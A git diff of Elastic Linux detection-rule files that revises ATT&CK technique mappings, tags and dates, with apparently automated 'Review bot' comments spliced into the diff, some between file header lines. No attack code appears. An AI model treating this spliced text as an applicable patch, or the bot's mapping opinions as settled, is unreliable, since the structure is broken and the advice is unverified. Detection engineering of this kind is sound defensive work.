-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
 [rule]
 author = ["Elastic"]
@@ -115,9 +115,9 @@ name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 [[rule.threat.technique.subtechnique]]
-id = "T1562.012"
-name = "Disable or Modify Linux Audit System"
-reference = "https://attack.mitre.org/techniques/T1562/012/"
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
 id = "TA0005"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
index 13326263087..f1d091298b1 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/22"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
 [rule]
 author = ["Elastic"]
@@ -123,9 +123,9 @@ name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 [[rule.threat.technique.subtechnique]]
-id = "T1562.004"
-name = "Disable or Modify System Firewall"
-reference = "https://attack.mitre.org/techniques/T1562/004/"
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
 id = "TA0005"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
index 3b30d99c0cd..716db12a621 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
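Review bot: The subtechnique swap from `T1562.012 Disable or Modify Linux Audit System` to `T1562.001 Disable or Modify Tools` in the auditd rule, and from `T1562.004 Disable or Modify System Firewall` to `T1562.001` in the iptables rule that follows it, replaces exact-fit ATT&CK subtechniques with the generic one and lowers mapping precision for coverage reporting. Unless the repository's pinned ATT&CK data no longer contains those subtechniques, the three `-` lines in each hunk should be kept as they were. The AppArmor and syslog rules that merely gain `T1562.001` in neighbouring hunks are not affected by this concern.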
@@ -2,7 +2,7 @@
 creation_date = "2020/04/27"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
 [rule]
 author = ["Elastic"]
@@ -132,6 +132,11 @@ id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
index 0f03df2bf50..b1c2b0ae4e9 100644
--- a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
+++ b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -98,11 +105,16 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_base64_decoding_activity.toml b/rules/linux/defense_evasion_base64_decoding_activity.toml index 2374ff50bea..375a8b62e4e 100644 --- a/rules/linux/defense_evasion_base64_decoding_activity.toml +++ b/rules/linux/defense_evasion_base64_decoding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -173,6 +173,11 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" 
@@ -182,3 +187,31 @@ reference = "https://attack.mitre.org/techniques/T1140/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml index 315be4335f6..2a3b2c93dca 100644 --- a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml +++ b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -119,6 +119,11 @@ id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_bpf_program_tampering.toml b/rules/linux/defense_evasion_bpf_program_tampering.toml index 50f16c631cf..f23dcdf2669 100644 --- a/rules/linux/defense_evasion_bpf_program_tampering.toml 
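Review bot: The new Execution entry maps base64 decoding to `T1204.002 User Execution: Malicious File`, which requires a user opening a delivered file; a decode run from a shell does not show that, so of the added techniques only `T1059.004 Unix Shell` is supported by the rule's subject. This file's `tags` line is not in this chunk, so whether a matching `"Tactic: Execution"` tag was added cannot be checked here; an Execution threat entry without the tag would leave the two out of sync. Consider dropping the `[[rule.threat.technique]]` block for `T1204` together with its `T1204.002` subtechnique.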
+++ b/rules/linux/defense_evasion_bpf_program_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -99,6 +99,11 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml index 736eb093333..b3f77d4cefc 100644 --- a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml +++ b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/24" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -117,6 +117,16 @@ id = "T1070.002" name = "Clear Linux or Mac System Logs" reference = "https://attack.mitre.org/techniques/T1070/002/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml index 8e8fee50ff4..05fae4d0549 100644 --- a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml +++ b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/11/20"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/24"
[rule]
author = ["Elastic"]
@@ -77,7 +77,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Tactic: Command and Control",
+ "Tactic: Exfiltration",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
type = "eql"
query = '''
sequence with maxspan=3s
@@ -134,25 +144,46 @@ sequence with maxspan=3s
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1105"
-name = "Ingress Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1105/"
+ [rule.threat.tactic]
+ name = "Defense Evasion"
+ id = "TA0005"
+ reference = "https://attack.mitre.org/tactics/TA0005/"
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
+ [[rule.threat.technique]]
+ id = "T1218"
+ name = "System Binary Proxy Execution"
+ reference = "https://attack.mitre.org/techniques/T1218/"
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
+ [rule.threat.tactic]
+ name = "Execution"
+ id = "TA0002"
+ reference = "https://attack.mitre.org/tactics/TA0002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+ [[rule.threat.technique]]
+ id = "T1059"
+ name = "Command and Scripting Interpreter"
+ reference = "https://attack.mitre.org/techniques/T1059/"
+
+ [[rule.threat.technique.subtechnique]]
+ name = "Unix Shell"
+ id = "T1059.004"
+ reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ id = "TA0011"
+ name = "Command and Control"
+ reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+ [rule.threat.tactic]
+ id = "TA0010"
+ name = "Exfiltration"
+ reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/linux/defense_evasion_directory_creation_in_bin.toml b/rules/linux/defense_evasion_directory_creation_in_bin.toml
index 061fea69f52..450965c1864 100644
--- a/rules/linux/defense_evasion_directory_creation_in_bin.toml
+++ b/rules/linux/defense_evasion_directory_creation_in_bin.toml
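Review bot: After this hunk the Command and Control and Exfiltration entries carry a tactic and no technique at all, and T1105 (Ingress Tool Transfer), the one technique the old mapping had for a curl/wget download, is dropped, so ATT&CK coverage for the download the rule actually detects gets weaker while the tag list grows. Re-attach T1105 under TA0011 and, if Exfiltration stays, give it a concrete technique such as T1048 (Exfiltration Over Alternative Protocol) or remove the tactic-only entry. Key order also flips between blocks in this hunk (`name` before `id` in the Defense Evasion and Execution tactic blocks, `id` first elsewhere); pick one order for the file. The rewrite below shows only the C2 entry with T1105 restored; the other three entries are as in the hunk.
```toml
[[rule.threat]]
framework = "MITRE ATT&CK"

  [rule.threat.tactic]
  id = "TA0011"
  name = "Command and Control"
  reference = "https://attack.mitre.org/tactics/TA0011/"

  [[rule.threat.technique]]
  id = "T1105"
  name = "Ingress Tool Transfer"
  reference = "https://attack.mitre.org/techniques/T1105/"
# … unchanged: Defense Evasion, Execution and Exfiltration entries …
```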
@@ -2,7 +2,7 @@ creation_date = "2024/11/01"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
[rule]
author = ["Elastic"]
@@ -83,7 +83,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -111,3 +122,11 @@ reference = "https://attack.mitre.org/techniques/T1564/001/"
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/defense_evasion_disable_selinux_attempt.toml b/rules/linux/defense_evasion_disable_selinux_attempt.toml
index c2cbb5316e5..b6e65ea7aca 100644
--- a/rules/linux/defense_evasion_disable_selinux_attempt.toml
+++ b/rules/linux/defense_evasion_disable_selinux_attempt.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/22"
integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
[rule]
author = ["Elastic"]
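Review bot: The new Persistence entry is a bare tactic with no technique, so it asserts an adversary goal without saying how a directory created under /bin achieves it; the hiding aspect is already covered by the T1564.001 mapping in the context above. Either attach the technique the author has in mind for persistence or drop the entry together with the matching `"Tactic: Persistence"` tag added in the hunk above, since a tactic-only mapping cannot be validated against ATT&CK and mostly widens the tag list. The rule's query, which would show whether persistence paths are in scope, lies outside the hunk.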
@@ -125,6 +125,11 @@ id = "T1562"
name = "Impair Defenses"
reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
index ea2413b54ff..8f0a8af6a0e 100644
--- a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
+++ b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
@@ -2,7 +2,7 @@ creation_date = "2024/08/28"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
[rule]
author = ["Elastic"]
@@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -94,20 +103,12 @@ id = "T1548"
name = "Abuse Elevation Control Mechanism"
reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.003"
+name = "Sudo and Sudo Caching"
+reference = "https://attack.mitre.org/techniques/T1548/003/"
+
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml
index 5fe58a162db..b838709d6db 100644
--- a/rules/linux/defense_evasion_file_mod_writable_dir.toml
+++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/21"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
[rule]
author = ["Elastic"]
@@ -131,15 +131,11 @@ id = "T1222"
name = "File and Directory Permissions Modification"
reference = "https://attack.mitre.org/techniques/T1222/"
-[[rule.threat.technique.subtechnique]]
-id = "T1222.002"
-name = "Linux and Mac File and Directory Permissions Modification"
-reference = "https://attack.mitre.org/techniques/T1222/002/"
-
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
+
[rule.new_terms]
field = "new_terms_fields"
value = ["host.id", "process.parent.executable", "process.command_line"]
diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
index 7091c85fb0f..96000cee0bf 100644
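Review bot: This hunk deletes the Privilege Escalation entry outright, leaving a doas.conf creation/rename rule mapped only to Defense Evasion; T1548 (Abuse Elevation Control Mechanism) sits under both TA0004 and TA0005 in ATT&CK, and a rule whose whole point is that the file grants elevation should keep the TA0004 entry with the same T1548/T1548.003 technique rather than lose it. The tags hunk above removes `"Tactic: Privilege Escalation"` to match, so restoring one means restoring both. T1548.003 (Sudo and Sudo Caching) is sudo-specific and doas is a separate program with its own config; a one-line note in the rule description that .003 is used as the nearest sub-technique would keep the mapping honest.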
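Review bot: Dropping T1222.002 (Linux and Mac File and Directory Permissions Modification) and keeping only the parent T1222 makes the mapping less precise for a rule whose name and `new_terms` fields (`process.command_line`, `process.parent.executable`) suggest permission changes on a Linux host; the sub-technique was the right one and nothing in the hunk explains the generalisation. Restore the four removed `[[rule.threat.technique.subtechnique]]` lines unless the rule is being broadened to other platforms, in which case the `integration` line above (still `["endpoint"]`) and the rule's OS tag should say so.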
--- a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
+++ b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/29"
integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
[rule]
author = ["Elastic"]
@@ -84,7 +84,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Data Source: Auditd Manager",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -104,12 +116,40 @@ id = "T1027"
name = "Obfuscated Files or Information"
reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique.subtechnique]]
-id = "T1027.010"
-name = "Command Obfuscation"
-reference = "https://attack.mitre.org/techniques/T1027/010/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
index ff3937346a6..62bddb86804 100644
--- a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
+++ b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
@@ -2,7 +2,7 @@ creation_date = "2024/11/04"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
[rule]
author = ["Elastic"]
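Review bot: T1027.010 (Command Obfuscation) is removed here although a hex-encoded payload on the command line is exactly what that sub-technique names; adding T1140 is reasonable, but it should sit beside .010, not replace it. In the new Execution entry, T1204.002 (Malicious File) assumes a user opening a file, which a command-line decode chain does not require; keep T1059.004 and drop the T1204/T1204.002 blocks unless the query (outside the hunk) really keys on user-launched files. Concretely: keep the removed `[[rule.threat.technique.subtechnique]]` block for `T1027.010` and delete the two T1204 blocks.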
@@ -128,6 +128,11 @@ not (
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
+
[[rule.threat.technique]]
id = "T1140"
name = "Deobfuscate/Decode Files or Information"
@@ -146,6 +151,21 @@ id = "T1059"
name = "Command and Scripting Interpreter"
reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
[rule.threat.tactic]
id = "TA0002"
name = "Execution"
diff --git a/rules/linux/defense_evasion_hidden_directory_creation.toml b/rules/linux/defense_evasion_hidden_directory_creation.toml
index aaaaf7ab199..59a908829de 100644
--- a/rules/linux/defense_evasion_hidden_directory_creation.toml
+++ b/rules/linux/defense_evasion_hidden_directory_creation.toml
@@ -2,7 +2,7 @@ creation_date = "2024/11/01"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
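Review bot: The Execution entry gains T1204.002 (Malicious File), which presumes user interaction, for a rule about a utility decoding a hex payload; the added T1059.004 is the fitting Execution mapping and the T1204/T1204.002 blocks should go unless the query (outside the hunk) targets user-launched files. The first hunk adds the parent T1027 beside T1140, which is fine; if the encoded bytes are observed on the command line, T1027.010 (Command Obfuscation) would be the more specific choice.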
@@ -85,7 +85,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Tactic: Persistence",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -121,3 +131,11 @@ reference = "https://attack.mitre.org/techniques/T1564/001/"
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
index bcb12bbfe9a..bb71c416c74 100644
--- a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
+++ b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/29"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
@@ -139,3 +139,11 @@ reference = "https://attack.mitre.org/techniques/T1564/001/"
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
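Review bot: `"Tactic: Persistence"` is inserted between two `Data Source:` tags instead of next to `"Tactic: Defense Evasion"`, breaking the grouping every other tag list in this patch keeps (domain, OS, use case, tactics, data sources, resources). Move it up one position so the tactic tags stay contiguous; the content itself matches the Persistence entry added to `rule.threat` in the next hunk.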
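Review bot: The added Persistence entry has a tactic and no technique, so it cannot be checked against ATT&CK and only widens the tag surface; a hidden directory is already covered by the T1564.001 mapping in the context above. Attach the technique that makes this persistence, or drop the entry and its tag. The same tactic-only Persistence block is added to several rules in this patch; if that is a deliberate convention, stating it once in the PR description would save the question being asked per file.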
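Review bot: This file gains a Persistence tactic in `rule.threat` but no tags hunk for it appears in the patch, so its `tags` line (outside the hunk) still lacks `"Tactic: Persistence"` unless it is changed elsewhere; tags and threat tactics need to agree. As with the other hidden-file rules, the entry is tactic-only: add the technique that justifies persistence or leave the rule on T1564.001 under Defense Evasion and drop the block.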
diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
index c31d30624ef..46ad1a21591 100644
--- a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
+++ b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
@@ -2,7 +2,7 @@ creation_date = "2024/11/04"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/18"
[rule]
author = ["Elastic"]
@@ -46,7 +46,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+]
timestamp_override = "event.ingested"
type = "new_terms"
query = '''
@@ -117,20 +124,21 @@ In Linux environments, system users are typically non-interactive and serve spec
